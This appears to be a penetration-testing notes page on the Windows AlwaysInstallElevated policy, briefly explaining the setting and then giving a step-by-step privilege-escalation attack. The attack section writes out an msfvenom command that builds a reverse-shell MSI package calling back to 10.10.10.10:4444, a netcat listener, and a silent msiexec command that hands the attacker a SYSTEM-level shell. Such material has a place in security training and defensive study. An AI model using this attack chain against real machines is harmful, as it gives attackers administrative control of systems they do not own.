Always Install Elevated
Overview
The Always Install Elevated policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts.
How It Works
When the Always Install Elevated setting is enabled, the following occurs:
Elevation of Installations: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.
UAC Bypass: Users do not see the standard UAC prompt, which can prevent them from being aware of the risks associated with the installation of potentially harmful software.
Creating and Executing a Malicious MSI Package for Reverse Shell Access
Generate the Malicious MSI Package:
Use
msfvenomto create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to10.10.10.10, and the local port (LPORT) is set to4444.The command to generate the MSI package is as follows:
dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi
Transfer the MSI File:
After generating the
dbs.msifile, transfer it to the target machine where you want to execute it.
Set Up a Netcat Listener:
On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed:
nc -lnvp 4444
Execute the MSI Package:
On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system:
C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart
After executing this command, the target machine will connect back to your listener, providing you with a reverse shell with system privileges.
Last updated
Was this helpful?